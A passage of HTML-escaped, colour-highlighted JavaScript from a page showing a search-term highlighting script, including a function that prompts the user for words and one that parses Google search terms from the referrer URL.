#66ccff;"&gt;searchText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;];&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&amp;nbsp;else&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchArray&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;split&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;nbsp;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(!&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;body&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;||&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;typeof&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;body&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;innerHTML&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;==&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"undefined"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;warnOnFailure&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;alert&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"Sorry,&amp;nbsp;for&amp;nbsp;some&amp;nbsp;reason&amp;nbsp;the&amp;nbsp;text&amp;nbsp;of&amp;nbsp;this&amp;nbsp;page&amp;nbsp;is&amp;nbsp;unavailable.&amp;nbsp;Searching&amp;nbsp;will&amp;nbsp;not&amp;nbsp;work."&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;false&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;body&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;innerHTML&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;for&amp;nbsp;(var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;0&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchArray&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;++)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;doHighlight&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchArray&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;[&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;i&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;],&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;document&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;body&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;innerHTML&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bodyText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;return&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;true&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;}&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;/*&lt;br /&gt;&amp;nbsp;*&amp;nbsp;This&amp;nbsp;displays&amp;nbsp;a&amp;nbsp;dialog&amp;nbsp;box&amp;nbsp;that&amp;nbsp;allows&amp;nbsp;a&amp;nbsp;user&amp;nbsp;to&amp;nbsp;enter&amp;nbsp;their&amp;nbsp;own&lt;br /&gt;&amp;nbsp;*&amp;nbsp;search&amp;nbsp;terms&amp;nbsp;to&amp;nbsp;highlight&amp;nbsp;on&amp;nbsp;the&amp;nbsp;page,&amp;nbsp;and&amp;nbsp;then&amp;nbsp;passes&amp;nbsp;the&amp;nbsp;search&lt;br /&gt;&amp;nbsp;*&amp;nbsp;text&amp;nbsp;or&amp;nbsp;phrase&amp;nbsp;to&amp;nbsp;the&amp;nbsp;highlightSearchTerms&amp;nbsp;function.&amp;nbsp;All&amp;nbsp;parameters&lt;br /&gt;&amp;nbsp;*&amp;nbsp;are&amp;nbsp;optional.&lt;br /&gt;&amp;nbsp;*/&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;function&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchPrompt&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;defaultText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;treatAsPhrase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;textColor&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bgColor&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;This&amp;nbsp;function&amp;nbsp;prompts&amp;nbsp;the&amp;nbsp;user&amp;nbsp;for&amp;nbsp;any&amp;nbsp;words&amp;nbsp;that&amp;nbsp;should&lt;br /&gt;&amp;nbsp;&amp;nbsp;//&amp;nbsp;be&amp;nbsp;highlighted&amp;nbsp;on&amp;nbsp;this&amp;nbsp;web&amp;nbsp;page&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;if&amp;nbsp;(!&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;defaultText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;defaultText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;""&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;we&amp;nbsp;can&amp;nbsp;optionally&amp;nbsp;use&amp;nbsp;our&amp;nbsp;own&amp;nbsp;highlight&amp;nbsp;tag&amp;nbsp;values&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;if&amp;nbsp;((!&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;textColor&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;||&amp;nbsp;(!&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bgColor&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;))&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;""&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;""&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&amp;nbsp;else&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;lt;font&amp;nbsp;style='color:"&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;textColor&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;";&amp;nbsp;background-color:"&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;bgColor&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;";'&amp;gt;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;lt;/font&amp;gt;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;treatAsPhrase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;promptText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"Please&amp;nbsp;enter&amp;nbsp;the&amp;nbsp;phrase&amp;nbsp;you'd&amp;nbsp;like&amp;nbsp;to&amp;nbsp;search&amp;nbsp;for:"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&amp;nbsp;else&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;promptText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"Please&amp;nbsp;enter&amp;nbsp;the&amp;nbsp;words&amp;nbsp;you'd&amp;nbsp;like&amp;nbsp;to&amp;nbsp;search&amp;nbsp;for,&amp;nbsp;separated&amp;nbsp;by&amp;nbsp;spaces:"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchText&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;prompt&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;promptText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;defaultText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(!&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;alert&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"No&amp;nbsp;search&amp;nbsp;terms&amp;nbsp;were&amp;nbsp;entered.&amp;nbsp;Exiting&amp;nbsp;function."&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;false&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;return&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightSearchTerms&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;searchText&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;treatAsPhrase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;true&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightStartTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightEndTag&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;}&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;/*&lt;br /&gt;&amp;nbsp;*&amp;nbsp;This&amp;nbsp;function&amp;nbsp;takes&amp;nbsp;a&amp;nbsp;referer/referrer&amp;nbsp;string&amp;nbsp;and&amp;nbsp;parses&amp;nbsp;it&lt;br /&gt;&amp;nbsp;*&amp;nbsp;to&amp;nbsp;determine&amp;nbsp;if&amp;nbsp;it&amp;nbsp;contains&amp;nbsp;any&amp;nbsp;search&amp;nbsp;terms.&amp;nbsp;If&amp;nbsp;it&amp;nbsp;does,&amp;nbsp;the&lt;br /&gt;&amp;nbsp;*&amp;nbsp;search&amp;nbsp;terms&amp;nbsp;are&amp;nbsp;passed&amp;nbsp;to&amp;nbsp;the&amp;nbsp;highlightSearchTerms&amp;nbsp;function&lt;br /&gt;&amp;nbsp;*&amp;nbsp;so&amp;nbsp;they&amp;nbsp;can&amp;nbsp;be&amp;nbsp;highlighted&amp;nbsp;on&amp;nbsp;the&amp;nbsp;current&amp;nbsp;page.&lt;br /&gt;&amp;nbsp;*/&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;function&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;highlightGoogleSearchTerms&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrer&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;This&amp;nbsp;function&amp;nbsp;has&amp;nbsp;only&amp;nbsp;been&amp;nbsp;very&amp;nbsp;lightly&amp;nbsp;tested&amp;nbsp;against&lt;br /&gt;&amp;nbsp;&amp;nbsp;//&amp;nbsp;typical&amp;nbsp;Google&amp;nbsp;search&amp;nbsp;URLs.&amp;nbsp;If&amp;nbsp;you&amp;nbsp;wanted&amp;nbsp;the&amp;nbsp;Google&amp;nbsp;search&lt;br /&gt;&amp;nbsp;&amp;nbsp;//&amp;nbsp;terms&amp;nbsp;to&amp;nbsp;be&amp;nbsp;automatically&amp;nbsp;highlighted&amp;nbsp;on&amp;nbsp;a&amp;nbsp;page,&amp;nbsp;you&amp;nbsp;could&lt;br /&gt;&amp;nbsp;&amp;nbsp;//&amp;nbsp;call&amp;nbsp;the&amp;nbsp;function&amp;nbsp;in&amp;nbsp;the&amp;nbsp;onload&amp;nbsp;event&amp;nbsp;of&amp;nbsp;your&amp;nbsp;&amp;lt;body&amp;gt;&amp;nbsp;tag,&lt;br /&gt;&amp;nbsp;&amp;nbsp;//&amp;nbsp;like&amp;nbsp;this:&lt;br /&gt;&amp;nbsp;&amp;nbsp;//&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;body&amp;nbsp;onload='highlightGoogleSearchTerms(document.referrer);'&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;//var&amp;nbsp;referrer&amp;nbsp;=&amp;nbsp;document.referrer;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;if&amp;nbsp;(!&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrer&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;false&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryPrefix&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"q="&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;startPos&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrer&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;toLowerCase&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;().&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;indexOf&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryPrefix&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;((&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;startPos&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;0&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;||&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;startPos&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryPrefix&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;==&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrer&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;))&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;false&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;endPos&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrer&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;indexOf&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;amp;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;startPos&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;if&amp;nbsp;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;endPos&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;&amp;lt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;0&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;{&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;endPos&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrer&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;;&lt;br /&gt;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;var&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;referrer&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;substring&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;startPos&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;+&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryPrefix&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;length&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;endPos&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;fix&amp;nbsp;the&amp;nbsp;space&amp;nbsp;characters&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;replace&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(/%&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;20&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;/&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;gi&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;nbsp;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;replace&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(/\+/&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;gi&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;nbsp;"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ffcccc;"&gt;//&amp;nbsp;remove&amp;nbsp;the&amp;nbsp;quotes&amp;nbsp;(if&amp;nbsp;you're&amp;nbsp;really&amp;nbsp;creative,&amp;nbsp;you&amp;nbsp;could&amp;nbsp;search&amp;nbsp;for&amp;nbsp;the&lt;br /&gt;&amp;nbsp;&amp;nbsp;//&amp;nbsp;terms&amp;nbsp;within&amp;nbsp;the&amp;nbsp;quotes&amp;nbsp;as&amp;nbsp;phrases,&amp;nbsp;and&amp;nbsp;everything&amp;nbsp;else&amp;nbsp;as&amp;nbsp;single&amp;nbsp;terms)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;queryString&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;.&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;replace&lt;/span&gt;&lt;span style="color: 